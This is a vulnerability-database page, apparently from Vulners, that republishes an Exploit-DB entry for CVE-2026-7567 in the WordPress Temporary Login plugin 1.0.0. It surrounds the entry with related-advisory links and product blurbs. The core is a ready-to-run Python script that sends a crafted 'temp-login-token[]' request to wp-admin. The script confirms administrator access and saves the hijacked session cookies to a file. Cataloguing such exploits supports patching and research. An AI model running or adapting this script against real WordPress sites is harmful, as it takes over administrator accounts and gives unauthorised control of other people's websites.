Lucene search
K

Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover

🗓️ 26 May 2026 00:00:00Reported by Amir Hossein JamshidiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 72 Views

Exploit for Wordpress Temporary Login Plugin 1.0.0 bypassing authentication to gain admin access.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-7567
1 May 202609:26
attackerkb
Circl
CVE-2026-7567
1 May 202611:11
circl
CNNVD
WordPress plugin Temporary Login 安全漏洞
1 May 202600:00
cnnvd
CVE
CVE-2026-7567
1 May 202609:26
cve
Cvelist
CVE-2026-7567 Temporary Login <= 1.0.0 - Authentication Bypass to Account Takeover
1 May 202609:26
cvelist
GithubExploit
Exploit for CVE-2026-7567
2 May 202607:58
githubexploit
EUVD
EUVD-2026-26490
1 May 202609:26
euvd
NVD
CVE-2026-7567
1 May 202610:15
nvd
Packet Storm
📄 WordPress Temporary Login 1.0.0 Authentication Bypass
29 May 202600:00
packetstorm
Patchstack
WordPress Temporary Login plugin <= 1.0.0 - Authentication Bypass to Account Takeover vulnerability
5 May 202610:14
patchstack
Rows per page
# Exploit Title: Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
#  Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass   #
#                   BY: Amir Hossein Jamshidi                                   #
#               Mail: [email protected]                           #
#           github: https://github.com/amirhosseinjamshidi64                    #
#                    Usage: python Exploit.py                                   #
#################################################################################
''')

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
    print("[✓] SUCCESS! Authentication bypassed!")
    print("[✓] WordPress logged-in cookie found")
    # Try to access admin area with the same session
    admin_check = requests.get(
        response.url.replace('wp-login.php', 'wp-admin/'),
        cookies=response.cookies
    )
    if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
        print("[✓] Full admin access confirmed!")
        print("[✓] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print("    - Plugin not installed or not version 1.0.0")
    print("    - No temporary users exist")
    print("    - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
    for cookie in response.cookies:
        f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.09246
SSVC
72